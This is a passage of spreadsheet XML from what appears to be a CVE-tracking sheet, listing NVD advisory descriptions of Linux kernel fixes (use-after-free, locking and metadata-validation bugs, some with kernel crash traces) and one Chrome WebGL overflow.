      </c>
      <c r="B1011" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93194</t>
        </is>
      </c>
      <c r="D1011" s="5" t="inlineStr"/>
      <c r="E1011" s="5" t="inlineStr"/>
      <c r="F1011" s="5" t="inlineStr"/>
      <c r="G1011" s="5" t="inlineStr"/>
      <c r="H1011" s="5" t="inlineStr"/>
      <c r="I1011" s="5" t="inlineStr"/>
      <c r="J1011" s="5" t="inlineStr"/>
      <c r="K1011" s="5" t="inlineStr"/>
      <c r="L1011" s="5" t="inlineStr"/>
      <c r="M1011" s="5" t="inlineStr"/>
      <c r="N1011" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1011" s="5" t="inlineStr"/>
      <c r="R1011" s="5" t="inlineStr"/>
      <c r="S1011" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/rockchip: dw_dp: Release core resources
Core resources such as the DisplayPort AUX channel get initialized and
registered during dw_dp_bind(), but are never unregistered, which may
lead to memory leaks and/or use-after-free:
[  224.661371] BUG: KASAN: slab-use-after-free in device_is_dependent+0xe0/0x2b0
[  224.662015] Read of size 8 at addr ffff00011aee8550 by task modprobe/658
[  224.662612]
[  224.662752] CPU: 7 UID: 0 PID: 658 Comm: modprobe Not tainted 7.0.0-rc2-next-20260305 #14 PREEMPT
[  224.662759] Hardware name: Radxa ROCK 5B (DT)
[  224.662762] Call trace:
[  224.662764]  show_stack+0x20/0x38 (C)
[  224.662772]  dump_stack_lvl+0x6c/0x98
[  224.662777]  print_report+0x160/0x4b8
[  224.662783]  kasan_report+0xb4/0xe0
[  224.662790]  __asan_report_load8_noabort+0x20/0x30
[  224.662796]  device_is_dependent+0xe0/0x2b0
[  224.662802]  device_is_dependent+0x108/0x2b0
[  224.662808]  device_link_add+0x1f8/0x10b0
[  224.662813]  devm_of_phy_get_by_index+0x120/0x200
[  224.662819]  dw_dp_bind+0x34c/0xb10 [dw_dp]
[  224.662830]  dw_dp_rockchip_bind+0x194/0x250 [rockchipdrm]
[  224.662864]  component_bind_all+0x3a8/0x720
[  224.662869]  rockchip_drm_bind+0x120/0x390 [rockchipdrm]
[  224.662899]  try_to_bring_up_aggregate_device+0x76c/0x838
[  224.662904]  component_master_add_with_match+0x1f4/0x230
[  224.662909]  rockchip_drm_platform_probe+0x420/0x538 [rockchipdrm]
[  224.662939]  platform_probe+0xe8/0x168
[  224.662945]  really_probe+0x340/0x828
[  224.662950]  __driver_probe_device+0x2e0/0x350
[  224.662954]  driver_probe_device+0x80/0x140
[  224.662959]  __driver_attach+0x398/0x460
[  224.662964]  bus_for_each_dev+0xe0/0x198
[  224.662968]  driver_attach+0x50/0x68
[  224.662972]  bus_add_driver+0x2a0/0x4c0
[  224.662977]  driver_register+0x294/0x360
[  224.662982]  __platform_driver_register+0x7c/0x98
[  224.662987]  rockchip_drm_init+0xc4/0xff8 [rockchipdrm]
Since a previous commit exported dw_dp_unbind() function in DW DP core
library to take care of the necessary cleanup, use this in the
component's unbind() callback, as well as in its bind() error path.</t>
        </is>
      </c>
      <c r="T1011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93194</t>
        </is>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1012" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93195</t>
        </is>
      </c>
      <c r="D1012" s="5" t="inlineStr"/>
      <c r="E1012" s="5" t="inlineStr"/>
      <c r="F1012" s="5" t="inlineStr"/>
      <c r="G1012" s="5" t="inlineStr"/>
      <c r="H1012" s="5" t="inlineStr"/>
      <c r="I1012" s="5" t="inlineStr"/>
      <c r="J1012" s="5" t="inlineStr"/>
      <c r="K1012" s="5" t="inlineStr"/>
      <c r="L1012" s="5" t="inlineStr"/>
      <c r="M1012" s="5" t="inlineStr"/>
      <c r="N1012" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1012" s="5" t="inlineStr"/>
      <c r="R1012" s="5" t="inlineStr"/>
      <c r="S1012" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/bridge: synopsys: dw-dp: Support unregistering the AUX channel
The DisplayPort AUX channel gets initialized and registered during
dw_dp_bind(), but it is never unregistered, which may lead to resource
leaks and/or use-after-free.
Add the missing dw_dp_unbind() function to allow the users of the
library to handle the required cleanup, i.e. unregister the AUX adapter.</t>
        </is>
      </c>
      <c r="T1012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93195</t>
        </is>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1013" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93196</t>
        </is>
      </c>
      <c r="D1013" s="5" t="inlineStr"/>
      <c r="E1013" s="5" t="inlineStr"/>
      <c r="F1013" s="5" t="inlineStr"/>
      <c r="G1013" s="5" t="inlineStr"/>
      <c r="H1013" s="5" t="inlineStr"/>
      <c r="I1013" s="5" t="inlineStr"/>
      <c r="J1013" s="5" t="inlineStr"/>
      <c r="K1013" s="5" t="inlineStr"/>
      <c r="L1013" s="5" t="inlineStr"/>
      <c r="M1013" s="5" t="inlineStr"/>
      <c r="N1013" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1013" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1013" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1013" s="5" t="inlineStr"/>
      <c r="R1013" s="5" t="inlineStr"/>
      <c r="S1013" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvdimm: virtio_pmem: refcount requests for token lifetime
KASAN reports slab-use-after-free in __wake_up_common():
BUG: KASAN: slab-use-after-free in __wake_up_common+0x114/0x160
Read of size 8 at addr ffff88810fdcb710 by task swapper/0/0
CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted
6.19.0-next-20260220-00006-g1eae5f204ec3 #4 PREEMPT(full)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux
1.17.0-2-2 04/01/2014
Call Trace:
 &lt;IRQ&gt;
 dump_stack_lvl+0x6d/0xb0
 print_report+0x170/0x4e2
 ? __pfx__raw_spin_lock_irqsave+0x10/0x10
 ? __virt_addr_valid+0x1dc/0x380
 kasan_report+0xbc/0xf0
 ? __wake_up_common+0x114/0x160
 ? __wake_up_common+0x114/0x160
 __wake_up_common+0x114/0x160
 ? __pfx__raw_spin_lock_irqsave+0x10/0x10
 __wake_up+0x36/0x60
 virtio_pmem_host_ack+0x11d/0x3b0
 ? sched_balance_domains+0x29f/0xb00
 ? __pfx_virtio_pmem_host_ack+0x10/0x10
 ? _raw_spin_lock_irqsave+0x98/0x100
 ? __pfx__raw_spin_lock_irqsave+0x10/0x10
 vring_interrupt+0x1c9/0x5e0
 ? __pfx_vp_interrupt+0x10/0x10
 vp_vring_interrupt+0x87/0x100
 ? __pfx_vp_interrupt+0x10/0x10
 __handle_irq_event_percpu+0x17f/0x550
 ? __pfx__raw_spin_lock+0x10/0x10
 handle_irq_event+0xab/0x1c0
 handle_fasteoi_irq+0x276/0xae0
 __common_interrupt+0x65/0x130
 common_interrupt+0x78/0xa0
 &lt;/IRQ&gt;
virtio_pmem_host_ack() wakes a request that has already been freed by the
submitter.
This happens when the request token is still reachable via the virtqueue,
but virtio_pmem_flush() returns and frees it.
Fix the token lifetime by refcounting struct virtio_pmem_request.
virtio_pmem_flush() holds a submitter reference, and the virtqueue holds an
extra reference once the request is queued. The completion path drops the
virtqueue reference, and the submitter drops its reference before
returning.</t>
        </is>
      </c>
      <c r="T1013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93196</t>
        </is>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1014" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93197</t>
        </is>
      </c>
      <c r="D1014" s="5" t="inlineStr"/>
      <c r="E1014" s="5" t="inlineStr"/>
      <c r="F1014" s="5" t="inlineStr"/>
      <c r="G1014" s="5" t="inlineStr"/>
      <c r="H1014" s="5" t="inlineStr"/>
      <c r="I1014" s="5" t="inlineStr"/>
      <c r="J1014" s="5" t="inlineStr"/>
      <c r="K1014" s="5" t="inlineStr"/>
      <c r="L1014" s="5" t="inlineStr"/>
      <c r="M1014" s="5" t="inlineStr"/>
      <c r="N1014" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1014" s="5" t="inlineStr"/>
      <c r="R1014" s="5" t="inlineStr"/>
      <c r="S1014" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
memcg: move LRU size accounting on reparenting instead of copying it
When a memory cgroup is offlined its LRU folios are reparented to the
parent.  lruvec_reparent_lru() splices the child's lists into the
parent's and credits the parent with the child's per-zone
lru_zone_size[], but never clears the child's copy, so the size is
copied rather than moved.  lru_gen_reparent_memcg() does the same for
MGLRU.
The parent is left correct, credited with exactly the folios it took
over.  The stale value sits on the child and nothing will correct it:
folio-&gt;memcg_data now resolves to the parent, so every later
update_lru_size() for those folios goes there.
Dying cgroups are not freed immediately and mem_cgroup_iter() still
walks them, so shrink_lruvec() keeps being called on them.
get_scan_count() reads the phantom counter through lruvec_lru_size() and
the scan loop then grinds through nr[] in SWAP_CLUSTER_MAX steps against
an empty list, for as long as the dead cgroup lives.  Under MGLRU the
MGLRU scanner runs instead, but count_shadow_nodes() sums all of
NR_LRU_LISTS through lruvec_lru_size() and over-budgets the shadow node
limit just the same.
On one 251 GiB host a sweep of every mz-&gt;lru_zone_size[] found 380
counters describing folios on no list at all: 124777314 pages, 476 GiB,
1.89x the machine's RAM, across 57 cgroups.  All were on memcgs with
CSS_DYING set and CSS_ONLINE clear, and parent/child pairs reported
byte-identical sizes.
LRU_UNEVICTABLE needs its size moved too.  Its list is deliberately not
spliced because lruvec_init() poisons the head - the unevictable LRU is
imaginary and folios are never threaded on it - but the size is kept by
lruvec_add_folio()/lruvec_del_folio() and those folios account to the
parent from here on.
This depends on commit bf4ade7dbd76 ("memcg: keep folio's objcg same as
its node") and must not be backported ahead of it.  Without that
invariant a folio's objcg can belong to another node, so a folio already
spliced onto the parent's list can still resolve to the child's lruvec
until the objcg's node is reparented in a later iteration of
memcg_reparent_objcgs(); clearing the child's counter early then lets
lruvec_del_folio() underflow it and trip the WARN_ONCE()/VM_BUG_ON() in
mem_cgroup_update_lru_size().</t>
        </is>
      </c>
      <c r="T1014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93197</t>
        </is>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1015" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93198</t>
        </is>
      </c>
      <c r="D1015" s="5" t="inlineStr"/>
      <c r="E1015" s="5" t="inlineStr"/>
      <c r="F1015" s="5" t="inlineStr"/>
      <c r="G1015" s="5" t="inlineStr"/>
      <c r="H1015" s="5" t="inlineStr"/>
      <c r="I1015" s="5" t="inlineStr"/>
      <c r="J1015" s="5" t="inlineStr"/>
      <c r="K1015" s="5" t="inlineStr"/>
      <c r="L1015" s="5" t="inlineStr"/>
      <c r="M1015" s="5" t="inlineStr"/>
      <c r="N1015" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1015" s="5" t="inlineStr"/>
      <c r="R1015" s="5" t="inlineStr"/>
      <c r="S1015" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: validate the persisted dirty_tail chain at load
The writeback worker follows the persisted dirty_tail chain, which is
decoded from the cache device independently of the key_tail chain that
cache_replay() walks and bounds. A crafted image, whose on-media fields are
authenticated only by a crc32c with a fixed seed, can aim dirty_tail at a
chain of last ksets that never terminates, so cache_writeback_fn() re-arms
itself with no delay forever.
Walk the dirty_tail chain once at load with the same hop cap cache_replay()
uses and fail the table load with -EIO if it does not reach an end within
n_segs hops.</t>
        </is>
      </c>
      <c r="T1015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93198</t>
        </is>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1016" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93199</t>
        </is>
      </c>
      <c r="D1016" s="5" t="inlineStr"/>
      <c r="E1016" s="5" t="inlineStr"/>
      <c r="F1016" s="5" t="inlineStr"/>
      <c r="G1016" s="5" t="inlineStr"/>
      <c r="H1016" s="5" t="inlineStr"/>
      <c r="I1016" s="5" t="inlineStr"/>
      <c r="J1016" s="5" t="inlineStr"/>
      <c r="K1016" s="5" t="inlineStr"/>
      <c r="L1016" s="5" t="inlineStr"/>
      <c r="M1016" s="5" t="inlineStr"/>
      <c r="N1016" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1016" s="5" t="inlineStr"/>
      <c r="R1016" s="5" t="inlineStr"/>
      <c r="S1016" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: master: Do not treat master device as a duplicate target
i3c_master_search_i3c_dev_duplicate() searches the bus for another I3C
device with the same PID as the reference device.  The search can match
master-&gt;this, causing the controller itself to be returned as a
duplicate.
Since the controller is not a target device, it cannot be a duplicate of
one.  Exclude master-&gt;this from matching so that the function only
returns real duplicate target devices.</t>
        </is>
      </c>
      <c r="T1016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93199</t>
        </is>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1017" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93200</t>
        </is>
      </c>
      <c r="D1017" s="5" t="inlineStr"/>
      <c r="E1017" s="5" t="inlineStr"/>
      <c r="F1017" s="5" t="inlineStr"/>
      <c r="G1017" s="5" t="inlineStr"/>
      <c r="H1017" s="5" t="inlineStr"/>
      <c r="I1017" s="5" t="inlineStr"/>
      <c r="J1017" s="5" t="inlineStr"/>
      <c r="K1017" s="5" t="inlineStr"/>
      <c r="L1017" s="5" t="inlineStr"/>
      <c r="M1017" s="5" t="inlineStr"/>
      <c r="N1017" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1017" s="5" t="inlineStr"/>
      <c r="R1017" s="5" t="inlineStr"/>
      <c r="S1017" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: master: Fix use-after-free of master-&gt;this
sysfs attribute callbacks for the master controller device dereference
master-&gt;this.  However, master-&gt;this is freed in
i3c_master_detach_free_devs() before the master device itself is
released.
As a result, sysfs accesses can dereference a freed master-&gt;this
pointer, leading to a use-after-free.
Keep master-&gt;this alive until i3c_masterdev_release(), which is called
after the master device and its sysfs state are being torn down. Do not
free master-&gt;this as part of the normal device detach path.
On the error path in i3c_master_set_info(), reset master-&gt;this and
bus.cur_master to NULL before freeing the allocated device.</t>
        </is>
      </c>
      <c r="T1017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93200</t>
        </is>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1018" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93201</t>
        </is>
      </c>
      <c r="D1018" s="5" t="inlineStr"/>
      <c r="E1018" s="5" t="inlineStr"/>
      <c r="F1018" s="5" t="inlineStr"/>
      <c r="G1018" s="5" t="inlineStr"/>
      <c r="H1018" s="5" t="inlineStr"/>
      <c r="I1018" s="5" t="inlineStr"/>
      <c r="J1018" s="5" t="inlineStr"/>
      <c r="K1018" s="5" t="inlineStr"/>
      <c r="L1018" s="5" t="inlineStr"/>
      <c r="M1018" s="5" t="inlineStr"/>
      <c r="N1018" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1018" s="5" t="inlineStr"/>
      <c r="R1018" s="5" t="inlineStr"/>
      <c r="S1018" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: validate seg_id fields from persistent memory
cache_pos_decode(), cache_key_decode() and the last-kset branches of
cache_replay(), the writeback worker and the GC worker take a cache
segment id from the cache device metadata and index cache-&gt;segments[]
with it without checking it against cache-&gt;n_segs. That metadata is only
CRC-protected with a fixed public seed, so whoever supplies the cache
device on a table load (CAP_SYS_ADMIN) controls the id; an out-of-range
value forms a wild pcache_cache_segment pointer that is dereferenced and
written through -- an out-of-bounds read and write driven by on-disk data.
Add cache_seg_id_valid() and reject an out-of-range id at each decode
site, failing the operation with -EIO instead of indexing past the array.
Bound the id against the initialized-segment count (cache_info.n_segs)
rather than the physical device total. A forged cache_info.n_segs below
seg_num otherwise leaves segments[cache_info.n_segs..seg_num) as zeroed
structs whose data pointer is NULL, so a forged id in that window would
still be dereferenced. A later patch guarantees cache_info.n_segs &lt;=
seg_num, and a driver-created cache sets the two equal, so valid images
are unaffected.</t>
        </is>
      </c>
      <c r="T1018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93201</t>
        </is>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1019" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93202</t>
        </is>
      </c>
      <c r="D1019" s="5" t="inlineStr"/>
      <c r="E1019" s="5" t="inlineStr"/>
      <c r="F1019" s="5" t="inlineStr"/>
      <c r="G1019" s="5" t="inlineStr"/>
      <c r="H1019" s="5" t="inlineStr"/>
      <c r="I1019" s="5" t="inlineStr"/>
      <c r="J1019" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K1019" s="5" t="inlineStr"/>
      <c r="L1019" s="5" t="inlineStr"/>
      <c r="M1019" s="5" t="inlineStr"/>
      <c r="N1019" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1019" s="5" t="inlineStr"/>
      <c r="R1019" s="5" t="inlineStr"/>
      <c r="S1019" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: master: Fix recursive locking during device registration
i3c_master_register_new_i3c_devs() registers newly discovered devices
while holding i3c_bus_normaluse_lock(), a down_read().  device_register()
can immediately probe the device, and probe callbacks typically invoke
I3C helpers that take i3c_bus_normaluse_lock() again, leading to a
recursive acquisition of the same rwsem.  rwsems do not support recursive
read locking and can deadlock when a writer is waiting.  See the
"Recursive read locks" section of Documentation/locking/lockdep-design.rst.
For example, with Intel LPSS I3C, LOCKDEP generates a WARNING like:
  # echo intel-lpss-i3c.0 &gt; /sys/bus/platform/drivers/mipi-i3c-hci/unbind
  # echo intel-lpss-i3c.0 &gt; /sys/bus/platform/drivers/mipi-i3c-hci/bind
  WARNING: possible recursive locking detected
  kworker/5:1/94 is trying to acquire lock:
  ffff88811c810d78 (&amp;i3cbus-&gt;lock){++++}-{4:4}, at: i3c_device_match_id+0x45/0x370
  but task is already holding lock:
  ffff88811c810d78 (&amp;i3cbus-&gt;lock){++++}-{4:4}, at: i3c_master_reg_work_fn+0x21/0x5f0
Fix this by separating device creation from device registration.
Populate desc-&gt;dev under the maintenance lock, collect the devices that
still need registration into a local list, then release the lock before
calling device_register().  Finally retake the lock and clean up any
devices that failed to register.
Use the maintenance lock rather than the normal-use lock while adding
device objects.  A write-side maintenance lock prevents readers from
observing a partially initialized desc-&gt;dev during initial device
population, or desc-&gt;dev disappearing if registration fails.
The local list requires a list node, so add a list node member to struct
i3c_device.</t>
        </is>
      </c>
      <c r="T1019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93202</t>
        </is>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1020" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93203</t>
        </is>
      </c>
      <c r="D1020" s="5" t="inlineStr"/>
      <c r="E1020" s="5" t="inlineStr"/>
      <c r="F1020" s="5" t="inlineStr"/>
      <c r="G1020" s="5" t="inlineStr"/>
      <c r="H1020" s="5" t="inlineStr"/>
      <c r="I1020" s="5" t="inlineStr"/>
      <c r="J1020" s="5" t="inlineStr"/>
      <c r="K1020" s="5" t="inlineStr"/>
      <c r="L1020" s="5" t="inlineStr"/>
      <c r="M1020" s="5" t="inlineStr"/>
      <c r="N1020" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1020" s="5" t="inlineStr"/>
      <c r="R1020" s="5" t="inlineStr"/>
      <c r="S1020" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
batman-adv: bla: avoid CRC corruption due to parallel claim add
batadv_bla_add_claim() is used to add claims and modify the backbone of
claims for CLAIM frames from remote backbones and local packets. When it
handles a claim, it needs to either
* add the new claim's CRC to the backbone CRC
* remove the already existing claim's CRC from the old backbone and add it
  to the new backbone
But when the "new" claim code was running in parallel to the "change
backbone" code, it can happen that the CRC was invalid because the
backbone_gw of the claim was changed twice in the "new" claim code path:
* CPU0 creates the claim for gateway A and publishes it in the claim
  hash. The crc16 of the address has not yet been added to A's crc at
  this point.
* CPU1 processes a claim frame of gateway B for the same client, finds
  the just published claim, and performs the ownership change: it
  switches the pointer to B, removes the crc16 from A's crc - which
  never contained it - and adds it to B's crc.
* CPU0 continues behind the creation branch, unconditionally switches
  the pointer back to A without compensating B's crc (its remove_crc
  is false for the creation path), and finally adds the crc16 to A's
  crc
The CRC is then wrong for both:
* claim belongs to A: but CRC is not part of backbone A's CRC
* claim doesn't belong to B: CRC is still part of backbone B's CRC
This wrong CRC is never recomputated from the stored claims. For local
backbone claims, this can also not recovered using syncs.
To avoid this, split the functionality in clear separate parts:
* new claim which always adds claim CRC to the backbone CRC (but never
  changes the already set backbone_gw of the claim back)
* update of existing claim which automatically changes the backbone_gw
  entry and only updates both backbone CRCs when there was an actual change</t>
        </is>
      </c>
      <c r="T1020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93203</t>
        </is>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1021" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93204</t>
        </is>
      </c>
      <c r="D1021" s="5" t="inlineStr"/>
      <c r="E1021" s="5" t="inlineStr"/>
      <c r="F1021" s="5" t="inlineStr"/>
      <c r="G1021" s="5" t="inlineStr"/>
      <c r="H1021" s="5" t="inlineStr"/>
      <c r="I1021" s="5" t="inlineStr"/>
      <c r="J1021" s="5" t="inlineStr"/>
      <c r="K1021" s="5" t="inlineStr"/>
      <c r="L1021" s="5" t="inlineStr"/>
      <c r="M1021" s="5" t="inlineStr"/>
      <c r="N1021" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1021" s="5" t="inlineStr"/>
      <c r="R1021" s="5" t="inlineStr"/>
      <c r="S1021" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
batman-adv: dat: atomically update mac addresses
When a MAC address is updated in batadv_dat_entry_add(), it is done using a
simple copy function. A parallel reader might only see parts of this
update. In worst case, the reader is transporting the half updated MAC
address over the network or is creating an ARP response using it -
poisoning the ARP cache.
atomic64_t can be used to store the 48 bit of a mac address. A reader will
then either see the old mac address or the new one - never a mixture of
both.</t>
        </is>
      </c>
      <c r="T1021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93204</t>
        </is>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1022" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93372</t>
        </is>
      </c>
      <c r="D1022" s="5" t="inlineStr"/>
      <c r="E1022" s="5" t="inlineStr"/>
      <c r="F1022" s="5" t="inlineStr"/>
      <c r="G1022" s="5" t="inlineStr"/>
      <c r="H1022" s="5" t="inlineStr"/>
      <c r="I1022" s="5" t="inlineStr"/>
      <c r="J1022" s="5" t="inlineStr"/>
      <c r="K1022" s="5" t="inlineStr"/>
      <c r="L1022" s="5" t="inlineStr"/>
      <c r="M1022" s="5" t="inlineStr"/>
      <c r="N1022" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1022" s="5" t="inlineStr"/>
      <c r="R1022" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S1022" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebGL in Google Chrome on on Android prior to 153.0.8010.52 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="T1022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93372</t>
        </is>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1023" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93373</t>
        </is>
      </c>
